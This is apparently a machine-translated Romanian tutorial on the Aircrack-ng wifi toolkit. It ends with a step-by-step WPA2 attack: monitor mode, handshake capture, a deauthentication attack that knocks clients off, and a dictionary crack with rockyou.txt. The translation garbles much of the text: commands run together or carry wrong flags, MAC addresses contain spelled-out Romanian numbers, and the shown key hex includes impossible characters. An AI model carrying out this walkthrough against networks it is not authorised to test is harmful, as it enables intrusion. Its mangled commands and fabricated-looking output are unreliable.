Cum se folosește Aircrack-ng

How Use Aircrack Ng



De cele mai multe ori, oamenii nu se gândesc niciodată la rețeaua la care sunt conectați. Nu se gândesc niciodată cât de sigură este acea rețea și cât de mult își riscă zilnic datele confidențiale. Puteți rula verificări de vulnerabilitate pe rețelele dvs. wifi utilizând un instrument foarte puternic numit Aircrack-ng și Wireshark. Wireshark este utilizat pentru a monitoriza activitatea rețelei. Aircrack-ng este mai mult ca un instrument agresiv care vă permite să hack și să oferiți acces la conexiunile wireless. Gândirea ca un intrus a fost întotdeauna cel mai sigur mod de a te proteja împotriva unui hack. S-ar putea să puteți înțelege acțiunile exacte pe care le va întreprinde un intrus pentru a obține acces la sistemul dvs., aflând despre aircrack. Apoi puteți efectua verificări de conformitate pe propriul dvs. sistem pentru a vă asigura că nu este nesigur.

Aircrack-ng este un set complet de software conceput pentru a testa securitatea rețelei WiFi. Nu este doar un singur instrument, ci o colecție de instrumente, fiecare dintre care îndeplinește un anumit scop. Pot fi lucrate diferite domenii de securitate wifi, cum ar fi monitorizarea punctului de acces, testarea, atacarea rețelei, spargerea rețelei wifi și testarea acesteia. Obiectivul cheie al Aircrack este interceptarea pachetelor și descifrarea hashurilor pentru a sparge parolele. Suportă aproape toate noile interfețe wireless. Aircrack-ng este o versiune îmbunătățită a unei suite de instrumente învechite Aircrack, ng se referă la Nouă generație . Unele dintre instrumentele minunate care funcționează împreună în realizarea unei sarcini mai mari.







Airmon:

Airmon-ng este inclus în kitul aircrack-ng care plasează placa de interfață de rețea în modul monitor. Cardurile de rețea acceptă, de obicei, numai pachetele vizate pentru acestea, așa cum sunt definite de adresa MAC a NIC, dar cu airmon-ng, toate pachetele wireless, indiferent dacă sunt sau nu vizate, vor fi acceptate și ele. Ar trebui să puteți prinde aceste pachete fără a vă conecta sau autentifica cu punctul de acces. Este folosit pentru a verifica starea unui punct de acces prin punerea interfeței de rețea în modul monitor. În primul rând, trebuie să configurați cardurile wireless pentru a activa modul de monitorizare, apoi să ucideți toate procesele de fundal dacă credeți că orice proces interferează cu acesta. După terminarea proceselor, modul monitor poate fi activat pe interfața fără fir executând comanda de mai jos:



[e-mail protejat]: ~ $sudoairmon-ng start wlan0#

De asemenea, puteți dezactiva modul monitor oprind ormonul oricând utilizând comanda de mai jos:

[e-mail protejat]: ~ $sudoairmon-ng stop wlan0#

Aerodump:

Airodump-ng este folosit pentru a lista toate rețelele care ne înconjoară și pentru a vizualiza informații valoroase despre acestea. Funcționalitatea de bază a airodump-ng este să adulmece pachete, deci este în esență programată să prindă toate pachetele din jurul nostru în timp ce este pus în modul monitor. Îl vom executa împotriva tuturor conexiunilor din jurul nostru și vom aduna date precum numărul de clienți conectați la rețea, adresele lor Mac corespunzătoare, stilul de criptare și numele canalelor și apoi vom începe să vizăm rețeaua noastră țintă.

Tastând comanda airodump-ng și oferindu-i numele interfeței de rețea ca parametru, putem activa acest instrument. Va enumera toate punctele de acces, cantitatea de pachete de date, metodele de criptare și autentificare utilizate și numele rețelei (ESSID). Din punct de vedere al hacking-ului, adresele Mac sunt cele mai importante câmpuri.

[e-mail protejat]: ~ $sudoairodump-ng wlx0mon

Aircrack:

Aircrack este utilizat pentru cracarea parolei. După capturarea tuturor pachetelor folosind airodump, putem sparge cheia prin aircrack. Crăpă aceste taste folosind două metode PTW și FMS. Abordarea PTW se face în două faze. La început, se folosesc doar pachetele ARP și abia apoi, dacă cheia nu este crăpată după căutare, folosește toate celelalte pachete capturate. Un punct pozitiv al abordării PTW este că nu toate pachetele sunt utilizate pentru cracare. În a doua abordare, adică FMS, folosim atât modelele statistice, cât și algele cu forță brută pentru a sparge cheia. De asemenea, poate fi utilizată o metodă de dicționar.

Aireplay:

Airplay-ng introduce pachete într-o rețea fără fir pentru a crea sau a accelera traficul. Pachetele din două surse diferite pot fi capturate de aireplay-ng. Primul este rețeaua live, iar al doilea este pachetele din fișierul pcap deja existent. Airplay-ng este util în timpul unui atac de deauthentificare care vizează un punct de acces wireless și un utilizator. Mai mult, puteți efectua unele atacuri, cum ar fi atacul cu cafea latte cu airplay-ng, un instrument care vă permite să obțineți o cheie din sistemul clientului. Puteți realiza acest lucru prin prinderea unui pachet ARP și apoi manipularea acestuia și trimiterea acestuia înapoi la sistem. Clientul va crea apoi un pachet care poate fi capturat de aerodump și aircrack fisurează cheia din acel pachet modificat. Unele alte opțiuni de atac ale airplay-ng includ chopchop, fragment areplay, etc.

Baza aeriana:

Airbase-ng este utilizat pentru a transforma computerul unui intrus într-un punct de conexiune compromis pentru ca alții să se conecteze. Folosind Airbase-ng, puteți pretinde că sunteți un punct de acces legal și puteți efectua atacuri man-in-the-middle asupra computerelor care sunt atașate la rețeaua dvs. Aceste tipuri de atacuri se numesc Evil Twin Attacks. Este imposibil ca utilizatorii de bază să discearnă între un punct de acces legal și un punct de acces fals. Deci, amenințarea malefică a gemenilor este una dintre cele mai amenințătoare amenințări wireless cu care ne confruntăm astăzi.

Airolib-ng:

Airolib accelerează procesul de hacking stocând și gestionând listele de parole și punctul de acces. Sistemul de gestionare a bazelor de date utilizat de acest program este SQLite3, care este disponibil în cea mai mare parte pe toate platformele. Cracarea parolei include calculul cheii master pereche prin care se extrage cheia tranzitorie privată (PTK). Folosind PTK, puteți determina codul de identificare a mesajului cadru (MIC) pentru un anumit pachet și, teoretic, puteți găsi MIC similar cu pachetul, deci dacă PTK avea dreptate, PMK avea dreptate și el.

Pentru a vedea listele de parole și pentru a accesa rețelele stocate în baza de date, tastați următoarea comandă:

[e-mail protejat]: ~ $sudoairolib-ng testdatabase –stats

Aici testdatabase este baza de date pe care doriți să o accesați sau să o creați și –stats este operația pe care doriți să o efectuați pe ea. Puteți efectua mai multe operații pe câmpurile bazei de date, cum ar fi acordarea priorității maxime unor SSID sau ceva similar. Pentru a utiliza airolib-ng cu aircrack-ng, introduceți următoarea comandă:

[e-mail protejat]: ~ $sudoaircrack-ng-rtestdatabase wpa2.eapol.cap

Aici folosim PMK-urile deja calculate stocate în baza de date de testare pentru accelerarea procesului de cracare a parolei.

Cracking WPA / WPA2 folosind Aircrack-ng:

Să vedem un mic exemplu de ceea ce poate face aircrack-ng cu ajutorul câtorva dintre instrumentele sale minunate. Vom sparge cheia pre-partajată a unei rețele WPA / WPA2 folosind o metodă de dicționar.

Primul lucru pe care trebuie să-l facem este să listăm interfețele de rețea care acceptă modul de monitorizare. Acest lucru se poate face folosind următoarea comandă:

[e-mail protejat]: ~ $sudoairmon-ng

Chipset pentru driverul de interfață PHY

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Putem vedea o interfață; acum, trebuie să punem interfața de rețea pe care am găsit-o (wlx0) în modul monitor folosind următoarea comandă:

[e-mail protejat]: ~ $sudoairmon-ng start wlx0

A activat modul de monitorizare pe interfața numită wlx0mon .

Acum ar trebui să începem să ascultăm difuzările de către routerele din apropiere prin interfața noastră de rețea pe care am pus-o în modul monitor.

[e-mail protejat]: ~ $sudoairodump-ng wlx0mon

CH5 ][Scurs:30s][ 2020-12-02 00:17



Balize BSSID PWR#Data, # / s CH MB ENC CIPHER AUTH ESSID



E4: 6F:13: 04: CE:31 -Patru cinci 62 27 0 154e WPA2 CCMP PSK CrackIt

C4: E9:84:76:10:FI-63 77 0 0 654e. WPA2 CCMP PSK Hackme

C8: 3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74: DĂ:88:FA:38: 02-68 28 2 0 unsprezece54e WPA2 CCMP PSK TP-Link_3802



BSSID STATION PWR Rate Sonde Cadre Pierdute



E4: 6F:13: 04: CE:315C: 3A:Patru cinci:D7:EA:8B -3 0- 1e8 5

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -331e- 6e0 3

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -35 0-1 0 6

E4: 6F:13: 04: CE:31BC:91: B5: F8: 7E: D5 -390e-1 1002 13

Rețeaua noastră țintă este Sparge-l în acest caz, care rulează în prezent pe canalul 1.

Aici, pentru a sparge parola rețelei țintă, trebuie să capturăm o strângere de mână în 4 direcții, care se întâmplă atunci când un dispozitiv încearcă să se conecteze la o rețea. O putem captura folosind următoarea comandă:

[e-mail protejat]: ~ $sudoairodump-ng-c 1--bssid E4: 6F:13: 04: CE:31 -în /acasă wlx0

-c : Canal

–Bss : Bssid al rețelei țintă

-în : Numele directorului în care va fi plasat fișierul pcap

Acum trebuie să așteptăm ca un dispozitiv să se conecteze la rețea, dar există o modalitate mai bună de a captura o strângere de mână. Putem anula autentificarea dispozitivelor către AP folosind un atac de auteautentificare folosind următoarea comandă:

[e-mail protejat]: ~ $sudoaireplay-ng-0 -laE4: 6F:13: 04: CE:31

la : Bssid al rețelei țintă

-0 : atac de deauthentificare

Am deconectat toate dispozitivele și acum trebuie să așteptăm ca un dispozitiv să se conecteze la rețea.

CH1 ][Scurs:30s][ 2020-12-02 00:02][Strângere de mână WPA: E4: 6F:13: 04: CE:31



Balize BSSID PWR RXQ#Data, # / s CH MB ENC CIPHER AUTH E



E4: 6F:13: 04: CE:31 -47 1 228 807 36 154 WPA2 CCMP PSK P



BSSID STATION PWR Rate Sonde Cadre Pierdute



E4: 6F:13: 04: CE:31BC:91: B5: F8: 7E: D5 -35 0-1 0 1

E4: 6F:13: 04: CE:315C: 3A:Patru cinci:D7:EA:8B -290e- 1e0 22

E4: 6F:13: 04: CE:31 88:28: B3:30:27: 7E -310e-1 0 32

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -350e- 6e263 708Sparge-l

E4: 6F:13: 04: CE:31D4: 6A: 6A:99: ED: E3 -350e- 0e0 86

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -37 0- 1e0 1

Am primit o lovitură și, uitându-ne la colțul din dreapta sus chiar lângă timp, putem vedea că a fost capturată o strângere de mână. Acum căutați în folderul specificat ( /Acasă în cazul nostru) pentru un .pcap fişier.

Pentru a sparge cheia WPA, putem folosi următoarea comandă:

[e-mail protejat]: ~ $sudoaircrack-ng-a2 -înrockyou.txt-bE4: 6F:13: 04: CE:31strângere de mână.cap

b: Bssid al rețelei țintă

-a2: modul WPA2

Rockyou.txt: Dicționarulfişierfolosit

Handshake.cap: Thefişier careconține strângere de mână capturată

Aircrack-ng1.2beta3

[00:01:49] 10566tastele testate(1017,96la/s)

CHEIE GĂSITĂ! [m-ai prins]

Cheie principală: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6FcincizeciC


Cheie tranzitorie: 4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC: CB 5A F8 CE62B2 1B F7 6FcincizeciC025 62E9 5D71

Cheia rețelei noastre țintă a fost spartă cu succes.

Concluzie:

Rețelele wireless sunt pretutindeni, utilizate de fiecare companie, de la lucrătorii care utilizează smartphone-uri la dispozitive de control industrial. Potrivit cercetărilor, aproape peste 50 la sută din traficul de internet va fi peste WiFi în 2021. Rețelele fără fir au multe avantaje, comunicarea în exteriorul ușilor, accesul rapid la internet în locuri unde este aproape imposibil să puneți cabluri, poate extinde rețeaua fără a instala cabluri pentru orice alt utilizator și vă poate conecta cu ușurință dispozitivele mobile la birourile de acasă în timp ce nu sunteți acolo.

În ciuda acestor avantaje, există un mare semn de întrebare cu privire la confidențialitatea și securitatea dvs. Ca aceste rețele; în raza de transmisie a routerelor sunt deschise tuturor, pot fi ușor atacate, iar datele dvs. pot fi ușor compromise. De exemplu, dacă sunteți conectat la o rețea Wi-Fi publică, oricine este conectat la rețeaua respectivă vă poate verifica cu ușurință traficul de rețea utilizând o anumită informație și cu ajutorul unor instrumente minunate disponibile și chiar le poate arunca.